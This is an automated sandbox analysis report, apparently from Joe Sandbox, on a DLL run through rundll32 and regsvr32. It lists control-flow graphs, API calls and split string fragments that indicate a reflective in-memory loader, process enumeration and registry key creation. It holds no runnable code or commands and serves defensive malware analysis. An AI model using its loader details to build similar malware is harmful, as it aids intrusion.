                                                                                                      execution_graph 3078 180016464 3081 1800164a2 3078->3081 3080 180016b9d 3081->3080 3082 18000741c 3081->3082 3083 18000745d 3082->3083 3084 1800284b0 CreateProcessW 3083->3084 3085 1800075fe 3084->3085 3085->3080 3055 18000be34 3058 180005db4 3055->3058 3057 18000bf4c 3059 180005df9 3058->3059 3060 1800060dd Process32FirstW 3059->3060 3061 180005e61 3059->3061 3060->3059 3061->3057 3097 180015b18 3099 180015b4c 3097->3099 3098 18000741c CreateProcessW 3098->3099 3099->3098 3100 1800160d6 3099->3100 3062 15cc5330000 3065 15cc533015a 3062->3065 3063 15cc533033f GetNativeSystemInfo 3064 15cc5330377 VirtualAlloc 3063->3064 3070 15cc53308eb 3063->3070 3066 15cc5330395 3064->3066 3065->3063 3065->3070 3067 15cc5330873 3066->3067 3069 15cc533084b VirtualProtect 3066->3069 3068 15cc53308c6 RtlAddFunctionTable 3067->3068 3067->3070 3068->3070 3069->3066 3086 1800096b8 3087 1800096f2 3086->3087 3088 18000971e 3087->3088 3090 18000be34 3087->3090 3091 180005db4 Process32FirstW 3090->3091 3092 18000bf4c 3091->3092 3092->3087 3101 18001d32c 3102 18001d36d 3101->3102 3103 18001d706 3102->3103 3104 18000be34 Process32FirstW 3102->3104 3104->3102 3071 18000741c 3072 18000745d 3071->3072 3075 1800284b0 3072->3075 3074 1800075fe 3077 180028554 3075->3077 3076 180028653 CreateProcessW 3076->3074 3077->3076 3109 18000f3e0 3112 18000f41e 3109->3112 3110 18000741c CreateProcessW 3111 18000fdb1 3110->3111 3112->3110 3112->3111

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 15cc5330000-15cc533029a call 15cc533091c * 2 13 15cc53302a0-15cc53302a4 0->13 14 15cc5330905 0->14 13->14 15 15cc53302aa-15cc53302ae 13->15 16 15cc5330907-15cc533091a 14->16 15->14 17 15cc53302b4-15cc53302b8 15->17 17->14 18 15cc53302be-15cc53302c5 17->18 18->14 19 15cc53302cb-15cc53302dc 18->19 19->14 20 15cc53302e2-15cc53302eb 19->20 20->14 21 15cc53302f1-15cc53302fc 20->21 21->14 22 15cc5330302-15cc5330312 21->22 23 15cc533033f-15cc5330371 GetNativeSystemInfo 22->23 24 15cc5330314-15cc533031a 22->24 23->14 25 15cc5330377-15cc5330393 VirtualAlloc 23->25 26 15cc533031c-15cc5330324 24->26 27 15cc5330395-15cc53303a8 25->27 28 15cc53303aa-15cc53303ae 25->28 29 15cc533032c-15cc533032d 26->29 30 15cc5330326-15cc533032a 26->30 27->28 32 15cc53303dc-15cc53303e3 28->32 33 15cc53303b0-15cc53303c2 28->33 31 15cc533032f-15cc533033d 29->31 30->31 31->23 31->26 36 15cc53303e5-15cc53303f9 32->36 37 15cc53303fb-15cc5330417 32->37 35 15cc53303d4-15cc53303d8 33->35 38 15cc53303c4-15cc53303d1 35->38 39 15cc53303da 35->39 36->36 36->37 40 15cc5330419-15cc533041a 37->40 41 15cc5330458-15cc5330465 37->41 38->35 39->37 44 15cc533041c-15cc5330422 40->44 42 15cc5330537-15cc5330542 41->42 43 15cc533046b-15cc5330472 41->43 47 15cc53306e6-15cc53306ed 42->47 48 15cc5330548-15cc5330559 42->48 43->42 49 15cc5330478-15cc5330485 43->49 45 15cc5330424-15cc5330446 44->45 46 15cc5330448-15cc5330456 44->46 45->45 45->46 46->41 46->44 52 15cc53307ac-15cc53307c3 47->52 53 15cc53306f3-15cc5330707 47->53 50 15cc5330562-15cc5330565 48->50 49->42 51 15cc533048b-15cc533048f 49->51 54 15cc5330567-15cc5330574 50->54 55 15cc533055b-15cc533055f 50->55 56 15cc533051b-15cc5330525 51->56 59 15cc533087a-15cc533088d 52->59 60 15cc53307c9-15cc53307cd 52->60 57 15cc533070d 53->57 58 15cc53307a9-15cc53307aa 53->58 63 15cc533060d-15cc5330619 54->63 64 15cc533057a-15cc533057d 54->64 55->50 61 15cc5330494-15cc53304a8 56->61 62 15cc533052b-15cc5330531 56->62 65 15cc5330712-15cc5330736 57->65 58->52 81 15cc533088f-15cc533089a 59->81 82 15cc53308b3-15cc53308ba 59->82 66 15cc53307d0-15cc53307d3 60->66 67 15cc53304cf-15cc53304d3 61->67 68 15cc53304aa-15cc53304cd 61->68 62->42 62->51 73 15cc533061f 63->73 74 15cc53306e2-15cc53306e3 63->74 64->63 69 15cc5330583-15cc533059b 64->69 94 15cc5330796-15cc533079f 65->94 95 15cc5330738-15cc533073e 65->95 71 15cc533085f-15cc533086d 66->71 72 15cc53307d9-15cc53307e9 66->72 77 15cc53304e3-15cc53304e7 67->77 78 15cc53304d5-15cc53304e1 67->78 76 15cc5330518-15cc5330519 68->76 69->63 79 15cc533059d-15cc533059e 69->79 71->66 75 15cc5330873-15cc5330874 71->75 83 15cc533080d-15cc533080f 72->83 84 15cc53307eb-15cc53307ed 72->84 85 15cc5330625-15cc5330648 73->85 74->47 75->59 76->56 92 15cc53304fe-15cc5330502 77->92 93 15cc53304e9-15cc53304fc 77->93 90 15cc5330511-15cc5330515 78->90 91 15cc53305a0-15cc5330605 79->91 96 15cc53308ab-15cc53308b1 81->96 86 15cc53308bc-15cc53308c4 82->86 87 15cc53308eb-15cc5330903 82->87 88 15cc5330822-15cc533082b 83->88 89 15cc5330811-15cc5330820 83->89 97 15cc53307ef-15cc53307f9 84->97 98 15cc53307fb-15cc533080b 84->98 108 15cc53306b2-15cc53306b7 85->108 109 15cc533064a-15cc533064b 85->109 86->87 100 15cc53308c6-15cc53308e9 RtlAddFunctionTable 86->100 87->16 103 15cc533082e-15cc533083d 88->103 89->103 90->76 91->91 104 15cc5330607 91->104 92->76 102 15cc5330504-15cc533050e 92->102 93->90 94->65 101 15cc53307a5-15cc53307a6 94->101 105 15cc5330740-15cc5330746 95->105 106 15cc5330748-15cc5330754 95->106 96->82 107 15cc533089c-15cc53308a8 96->107 97->103 98->103 100->87 101->58 102->90 110 15cc533083f-15cc5330845 103->110 111 15cc533084b-15cc533085c VirtualProtect 103->111 104->63 113 15cc533077b-15cc533078d 105->113 114 15cc5330756-15cc5330757 106->114 115 15cc5330764-15cc5330776 106->115 107->96 117 15cc53306ce-15cc53306d8 108->117 118 15cc53306b9-15cc53306bd 108->118 116 15cc533064e-15cc5330651 109->116 110->111 111->71 113->94 127 15cc533078f-15cc5330794 113->127 120 15cc5330759-15cc5330762 114->120 115->113 121 15cc5330653-15cc5330659 116->121 122 15cc533065b-15cc5330666 116->122 117->85 124 15cc53306de-15cc53306df 117->124 118->117 125 15cc53306bf-15cc53306c3 118->125 120->115 120->120 126 15cc533068d-15cc53306a3 121->126 128 15cc5330676-15cc5330688 122->128 129 15cc5330668-15cc5330669 122->129 124->74 125->117 130 15cc53306c5 125->130 133 15cc53306ac 126->133 134 15cc53306a5-15cc53306aa 126->134 127->95 128->126 131 15cc533066b-15cc5330674 129->131 130->117 131->128 131->131 133->108 134->116
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.316403178.0000015CC5330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000015CC5330000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_15cc5330000_rundll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                      • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                      • API String ID: 998211078-3605381585
                                                                                                      • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction ID: a6cbc12be8b59c34259962430d5e3d2ebc7bc61dabf2f493503d043379cfb627
                                                                                                      • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction Fuzzy Hash: 8B62AE30618F488FE759DF18D8857AAB7E0FB94305F14562DE88ACB251DB38E542CBC6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 385 1800284b0-18002857e call 180011408 388 180028653-18002868d CreateProcessW 385->388 389 180028584-18002864d call 18000f174 385->389 389->388
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.315165942.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                      • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                      • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                      • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:12.3%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:46
                                                                                                      Total number of Limit Nodes:2
                                                                                                      execution_graph 3078 180016464 3080 1800164a2 3078->3080 3081 180016b9d 3080->3081 3082 18000741c 3080->3082 3083 18000745d 3082->3083 3084 1800284b0 CreateProcessW 3083->3084 3085 1800075fe 3084->3085 3085->3081 3055 18000be34 3058 180005db4 3055->3058 3057 18000bf4c 3059 180005df9 3058->3059 3060 1800060dd Process32FirstW 3059->3060 3061 180005e61 3059->3061 3060->3059 3061->3057 3062 225b3af0000 3065 225b3af015a 3062->3065 3063 225b3af033f GetNativeSystemInfo 3064 225b3af0377 VirtualAlloc 3063->3064 3066 225b3af08eb 3063->3066 3070 225b3af0395 3064->3070 3065->3063 3065->3066 3067 225b3af0873 3067->3066 3068 225b3af08c6 RtlAddFunctionTable 3067->3068 3068->3066 3069 225b3af084b VirtualProtect 3069->3070 3070->3067 3070->3069 3097 180015b18 3099 180015b4c 3097->3099 3098 18000741c CreateProcessW 3098->3099 3099->3098 3100 1800160d6 3099->3100 3086 1800096b8 3087 1800096f2 3086->3087 3088 18000971e 3087->3088 3090 18000be34 3087->3090 3091 180005db4 Process32FirstW 3090->3091 3092 18000bf4c 3091->3092 3092->3087 3101 18001d32c 3102 18001d36d 3101->3102 3103 18001d706 3102->3103 3104 18000be34 Process32FirstW 3102->3104 3104->3102 3071 18000741c 3072 18000745d 3071->3072 3075 1800284b0 3072->3075 3074 1800075fe 3077 180028554 3075->3077 3076 180028653 CreateProcessW 3076->3074 3077->3076 3109 18000f3e0 3112 18000f41e 3109->3112 3110 18000741c CreateProcessW 3111 18000fdb1 3110->3111 3112->3110 3112->3111

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 225b3af0000-225b3af029a call 225b3af091c * 2 13 225b3af02a0-225b3af02a4 0->13 14 225b3af0905 0->14 13->14 15 225b3af02aa-225b3af02ae 13->15 16 225b3af0907-225b3af091a 14->16 15->14 17 225b3af02b4-225b3af02b8 15->17 17->14 18 225b3af02be-225b3af02c5 17->18 18->14 19 225b3af02cb-225b3af02dc 18->19 19->14 20 225b3af02e2-225b3af02eb 19->20 20->14 21 225b3af02f1-225b3af02fc 20->21 21->14 22 225b3af0302-225b3af0312 21->22 23 225b3af0314-225b3af031a 22->23 24 225b3af033f-225b3af0371 GetNativeSystemInfo 22->24 26 225b3af031c-225b3af0324 23->26 24->14 25 225b3af0377-225b3af0393 VirtualAlloc 24->25 29 225b3af03aa-225b3af03ae 25->29 30 225b3af0395-225b3af03a8 25->30 27 225b3af032c-225b3af032d 26->27 28 225b3af0326-225b3af032a 26->28 31 225b3af032f-225b3af033d 27->31 28->31 32 225b3af03b0-225b3af03c2 29->32 33 225b3af03dc-225b3af03e3 29->33 30->29 31->24 31->26 35 225b3af03d4-225b3af03d8 32->35 36 225b3af03fb-225b3af0417 33->36 37 225b3af03e5-225b3af03f9 33->37 40 225b3af03c4-225b3af03d1 35->40 41 225b3af03da 35->41 38 225b3af0419-225b3af041a 36->38 39 225b3af0458-225b3af0465 36->39 37->36 37->37 42 225b3af041c-225b3af0422 38->42 43 225b3af046b-225b3af0472 39->43 44 225b3af0537-225b3af0542 39->44 40->35 41->36 45 225b3af0424-225b3af0446 42->45 46 225b3af0448-225b3af0456 42->46 43->44 49 225b3af0478-225b3af0485 43->49 47 225b3af0548-225b3af0559 44->47 48 225b3af06e6-225b3af06ed 44->48 45->45 45->46 46->39 46->42 50 225b3af0562-225b3af0565 47->50 52 225b3af06f3-225b3af0707 48->52 53 225b3af07ac-225b3af07c3 48->53 49->44 51 225b3af048b-225b3af048f 49->51 54 225b3af055b-225b3af055f 50->54 55 225b3af0567-225b3af0574 50->55 56 225b3af051b-225b3af0525 51->56 57 225b3af070d 52->57 58 225b3af07a9-225b3af07aa 52->58 59 225b3af087a-225b3af088d 53->59 60 225b3af07c9-225b3af07cd 53->60 54->50 63 225b3af060d-225b3af0619 55->63 64 225b3af057a-225b3af057d 55->64 61 225b3af0494-225b3af04a8 56->61 62 225b3af052b-225b3af0531 56->62 65 225b3af0712-225b3af0736 57->65 58->53 82 225b3af08b3-225b3af08ba 59->82 83 225b3af088f-225b3af089a 59->83 66 225b3af07d0-225b3af07d3 60->66 67 225b3af04cf-225b3af04d3 61->67 68 225b3af04aa-225b3af04cd 61->68 62->44 62->51 73 225b3af06e2-225b3af06e3 63->73 74 225b3af061f 63->74 64->63 69 225b3af0583-225b3af059b 64->69 94 225b3af0738-225b3af073e 65->94 95 225b3af0796-225b3af079f 65->95 71 225b3af085f-225b3af086d 66->71 72 225b3af07d9-225b3af07e9 66->72 78 225b3af04e3-225b3af04e7 67->78 79 225b3af04d5-225b3af04e1 67->79 77 225b3af0518-225b3af0519 68->77 69->63 80 225b3af059d-225b3af059e 69->80 71->66 76 225b3af0873-225b3af0874 71->76 84 225b3af080d-225b3af080f 72->84 85 225b3af07eb-225b3af07ed 72->85 73->48 75 225b3af0625-225b3af0648 74->75 110 225b3af06b2-225b3af06b7 75->110 111 225b3af064a-225b3af064b 75->111 76->59 77->56 92 225b3af04fe-225b3af0502 78->92 93 225b3af04e9-225b3af04fc 78->93 90 225b3af0511-225b3af0515 79->90 91 225b3af05a0-225b3af0605 80->91 86 225b3af08bc-225b3af08c4 82->86 87 225b3af08eb-225b3af0903 82->87 96 225b3af08ab-225b3af08b1 83->96 88 225b3af0822-225b3af082b 84->88 89 225b3af0811-225b3af0820 84->89 97 225b3af07ef-225b3af07f9 85->97 98 225b3af07fb-225b3af080b 85->98 86->87 105 225b3af08c6-225b3af08e9 RtlAddFunctionTable 86->105 87->16 99 225b3af082e-225b3af083d 88->99 89->99 90->77 91->91 100 225b3af0607 91->100 92->77 107 225b3af0504-225b3af050e 92->107 93->90 101 225b3af0740-225b3af0746 94->101 102 225b3af0748-225b3af0754 94->102 95->65 106 225b3af07a5-225b3af07a6 95->106 96->82 103 225b3af089c-225b3af08a8 96->103 97->99 98->99 112 225b3af083f-225b3af0845 99->112 113 225b3af084b-225b3af085c VirtualProtect 99->113 100->63 115 225b3af077b-225b3af078d 101->115 108 225b3af0764-225b3af0776 102->108 109 225b3af0756-225b3af0757 102->109 103->96 105->87 106->58 107->90 108->115 119 225b3af0759-225b3af0762 109->119 116 225b3af06ce-225b3af06d8 110->116 117 225b3af06b9-225b3af06bd 110->117 120 225b3af064e-225b3af0651 111->120 112->113 113->71 115->95 128 225b3af078f-225b3af0794 115->128 116->75 122 225b3af06de-225b3af06df 116->122 117->116 121 225b3af06bf-225b3af06c3 117->121 119->108 119->119 123 225b3af0653-225b3af0659 120->123 124 225b3af065b-225b3af0666 120->124 121->116 126 225b3af06c5 121->126 122->73 127 225b3af068d-225b3af06a3 123->127 129 225b3af0668-225b3af0669 124->129 130 225b3af0676-225b3af0688 124->130 126->116 133 225b3af06ac 127->133 134 225b3af06a5-225b3af06aa 127->134 128->94 131 225b3af066b-225b3af0674 129->131 130->127 131->130 131->131 133->110 134->120
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.317608635.00000225B3AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000225B3AF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_225b3af0000_rundll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                      • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                      • API String ID: 998211078-3605381585
                                                                                                      • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction ID: 74542d6efa724ebc7861fd20311372c0b28d973c65b7424f975b4420710c0449
                                                                                                      • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction Fuzzy Hash: 9F623A30618F189BD759DF58C8897B9B3E1FB55304F20862DE88BEB255DB34E442CB86
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 380 1800284b0-18002857e call 180011408 383 180028653-18002868d CreateProcessW 380->383 384 180028584-18002864d call 18000f174 380->384 384->383
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.316792444.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                      • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                      • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                      • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:17.3%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:51
                                                                                                      Total number of Limit Nodes:5
                                                                                                      execution_graph 3179 180020c24 3180 180020c51 3179->3180 3181 180020cbf 3180->3181 3183 1800257b4 3180->3183 3185 1800257de 3183->3185 3186 180025b12 3185->3186 3187 180009298 3185->3187 3186->3181 3189 18000939e 3187->3189 3188 18000959c 3188->3185 3189->3188 3191 180001874 3189->3191 3193 180001904 3191->3193 3192 1800019de GetVolumeInformationW 3192->3188 3193->3192 3194 18000be34 3197 180005db4 3194->3197 3196 18000bf4c 3198 180005df9 3197->3198 3199 1800060dd Process32FirstW 3198->3199 3200 180005e61 3198->3200 3199->3198 3200->3196 3201 a30000 3204 a3015a 3201->3204 3202 a3033f GetNativeSystemInfo 3203 a30377 VirtualAlloc 3202->3203 3206 a308eb 3202->3206 3209 a30395 3203->3209 3204->3202 3204->3206 3205 a30873 3205->3206 3207 a308c6 RtlAddFunctionTable 3205->3207 3207->3206 3208 a3084b VirtualProtect 3208->3209 3209->3205 3209->3208 3224 180018778 3225 1800187ab 3224->3225 3226 1800187e7 3225->3226 3227 180013cec RegCreateKeyExW 3225->3227 3227->3225 3228 18001fb88 3231 18001fbb0 3228->3231 3229 18000be34 Process32FirstW 3229->3231 3230 18001fdcf 3231->3229 3231->3230 3232 1800096b8 3233 1800096f2 3232->3233 3234 18000971e 3233->3234 3235 18000be34 Process32FirstW 3233->3235 3235->3233 3217 18001d32c 3218 18001d36d 3217->3218 3219 18001d706 3218->3219 3221 18000be34 3218->3221 3222 180005db4 Process32FirstW 3221->3222 3223 18000bf4c 3222->3223 3223->3218 3210 180002a7c 3212 180002abc 3210->3212 3211 18000380d 3212->3211 3214 180013cec 3212->3214 3216 180013d99 3214->3216 3215 180013e8f RegCreateKeyExW 3215->3212 3216->3215

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 a30000-a3029a call a3091c * 2 13 a302a0-a302a4 0->13 14 a30905 0->14 13->14 15 a302aa-a302ae 13->15 16 a30907-a3091a 14->16 15->14 17 a302b4-a302b8 15->17 17->14 18 a302be-a302c5 17->18 18->14 19 a302cb-a302dc 18->19 19->14 20 a302e2-a302eb 19->20 20->14 21 a302f1-a302fc 20->21 21->14 22 a30302-a30312 21->22 23 a30314-a3031a 22->23 24 a3033f-a30371 GetNativeSystemInfo 22->24 25 a3031c-a30324 23->25 24->14 26 a30377-a30393 VirtualAlloc 24->26 27 a30326-a3032a 25->27 28 a3032c-a3032d 25->28 29 a30395-a303a8 26->29 30 a303aa-a303ae 26->30 31 a3032f-a3033d 27->31 28->31 29->30 32 a303b0-a303c2 30->32 33 a303dc-a303e3 30->33 31->24 31->25 34 a303d4-a303d8 32->34 35 a303e5-a303f9 33->35 36 a303fb-a30417 33->36 38 a303c4-a303d1 34->38 39 a303da 34->39 35->35 35->36 40 a30419-a3041a 36->40 41 a30458-a30465 36->41 38->34 39->36 42 a3041c-a30422 40->42 43 a30537-a30542 41->43 44 a3046b-a30472 41->44 45 a30424-a30446 42->45 46 a30448-a30456 42->46 47 a306e6-a306ed 43->47 48 a30548-a30559 43->48 44->43 49 a30478-a30485 44->49 45->45 45->46 46->41 46->42 52 a306f3-a30707 47->52 53 a307ac-a307c3 47->53 50 a30562-a30565 48->50 49->43 51 a3048b-a3048f 49->51 56 a30567-a30574 50->56 57 a3055b-a3055f 50->57 58 a3051b-a30525 51->58 59 a307a9-a307aa 52->59 60 a3070d 52->60 54 a3087a-a3088d 53->54 55 a307c9-a307cd 53->55 79 a308b3-a308ba 54->79 80 a3088f-a3089a 54->80 62 a307d0-a307d3 55->62 65 a3057a-a3057d 56->65 66 a3060d-a30619 56->66 57->50 63 a30494-a304a8 58->63 64 a3052b-a30531 58->64 59->53 61 a30712-a30736 60->61 91 a30796-a3079f 61->91 92 a30738-a3073e 61->92 69 a307d9-a307e9 62->69 70 a3085f-a3086d 62->70 73 a304aa-a304cd 63->73 74 a304cf-a304d3 63->74 64->43 64->51 65->66 67 a30583-a3059b 65->67 71 a306e2-a306e3 66->71 72 a3061f 66->72 67->66 76 a3059d-a3059e 67->76 82 a307eb-a307ed 69->82 83 a3080d-a3080f 69->83 70->62 85 a30873-a30874 70->85 71->47 84 a30625-a30648 72->84 75 a30518-a30519 73->75 77 a304e3-a304e7 74->77 78 a304d5-a304e1 74->78 75->58 86 a305a0-a30605 76->86 88 a304e9-a304fc 77->88 89 a304fe-a30502 77->89 87 a30511-a30515 78->87 95 a308eb-a30903 79->95 96 a308bc-a308c4 79->96 90 a308ab-a308b1 80->90 93 a307fb-a3080b 82->93 94 a307ef-a307f9 82->94 97 a30822-a3082b 83->97 98 a30811-a30820 83->98 111 a306b2-a306b7 84->111 112 a3064a-a3064b 84->112 85->54 86->86 99 a30607 86->99 87->75 88->87 89->75 106 a30504-a3050e 89->106 90->79 102 a3089c-a308a8 90->102 91->61 105 a307a5-a307a6 91->105 100 a30740-a30746 92->100 101 a30748-a30754 92->101 107 a3082e-a3083d 93->107 94->107 95->16 96->95 104 a308c6-a308e9 RtlAddFunctionTable 96->104 97->107 98->107 99->66 108 a3077b-a3078d 100->108 109 a30756-a30757 101->109 110 a30764-a30776 101->110 102->90 104->95 105->59 106->87 113 a3084b-a3085c VirtualProtect 107->113 114 a3083f-a30845 107->114 108->91 126 a3078f-a30794 108->126 117 a30759-a30762 109->117 110->108 119 a306b9-a306bd 111->119 120 a306ce-a306d8 111->120 118 a3064e-a30651 112->118 113->70 114->113 117->110 117->117 123 a30653-a30659 118->123 124 a3065b-a30666 118->124 119->120 121 a306bf-a306c3 119->121 120->84 125 a306de-a306df 120->125 121->120 130 a306c5 121->130 127 a3068d-a306a3 123->127 128 a30676-a30688 124->128 129 a30668-a30669 124->129 125->71 126->92 133 a306a5-a306aa 127->133 134 a306ac 127->134 128->127 131 a3066b-a30674 129->131 130->120 131->128 131->131 133->118 134->111
                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE ref: 00A30344
                                                                                                      • VirtualAlloc.KERNELBASE ref: 00A3038A
                                                                                                      • VirtualProtect.KERNELBASE ref: 00A3085C
                                                                                                      • RtlAddFunctionTable.KERNEL32 ref: 00A308E9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.699761961.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_a30000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                      • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                      • API String ID: 998211078-3605381585
                                                                                                      • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction ID: 646bd952f65b9303a36a5b0aa1fda4aa5f274b5ce718613deade05e03f65d242
                                                                                                      • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction Fuzzy Hash: 6F52F530618B488BD719DF18D895BBAB7F1FB94304F14462DE88BC7251DB34E946CB86
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 547 180013cec-180013dc2 call 180011408 550 180013dc8-180013e89 call 18000f174 547->550 551 180013e8f-180013ecc RegCreateKeyExW 547->551 550->551
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.700370184.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID: n$,
                                                                                                      • API String ID: 2289755597-3401186129
                                                                                                      • Opcode ID: 387e2cbc3b8f1e88da992bb010cb1f5f0f0347c8b7639cfc6325d4f78df53c71
                                                                                                      • Instruction ID: 2cb52e6b05ba7e48ba693a2826620437475c4cbbd9ed89f570f000b883edcea4
                                                                                                      • Opcode Fuzzy Hash: 387e2cbc3b8f1e88da992bb010cb1f5f0f0347c8b7639cfc6325d4f78df53c71
                                                                                                      • Instruction Fuzzy Hash: C251037051C7848FD7B8DF68D08579AFBE0FB88314F108A2EE88DD3250DB7498858B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.700370184.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InformationVolume
                                                                                                      • String ID:
                                                                                                      • API String ID: 2039140958-0
                                                                                                      • Opcode ID: c26c48defa982342e2f20ae4a22bab2a9dda78d1f7e6cee8cfcae6a4f9b5f28e
                                                                                                      • Instruction ID: 43b5742128dda7179e1ece1c22ac01b13fc8f1aebeeb4861cd8a3c6048fefe45
                                                                                                      • Opcode Fuzzy Hash: c26c48defa982342e2f20ae4a22bab2a9dda78d1f7e6cee8cfcae6a4f9b5f28e
                                                                                                      • Instruction Fuzzy Hash: 9A412A7051C7858FE7B4DF28D485B9AB7E0FB88315F10896DE88CC7296DB748888CB46
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:11.8%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:41
                                                                                                      Total number of Limit Nodes:3
